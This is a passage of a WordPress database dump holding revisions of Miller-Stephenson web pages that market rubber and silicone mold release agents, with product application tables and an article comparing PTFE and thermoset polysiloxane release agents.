href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Rubber Mold Release" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-09 15:25:43', '2016-11-09 15:25:43', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2966, 2, '2016-11-09 15:26:26', '2016-11-09 15:26:26', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\n<p>Sporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.</p>\n<p>ReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.</p>\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\n<p>Our ReleaSys™ mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.</p>\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\n<table style="height: 1010px;" width="829">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n[ux_product_categories ids="21" number="10"]\n\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-09 15:26:26', '2016-11-09 15:26:26', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2967, 3, '2016-11-09 16:08:10', '2016-11-09 16:08:10', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-09 16:08:10', '2016-11-09 16:08:10', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2968, 3, '2016-11-09 16:08:46', '2016-11-09 16:08:46', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation 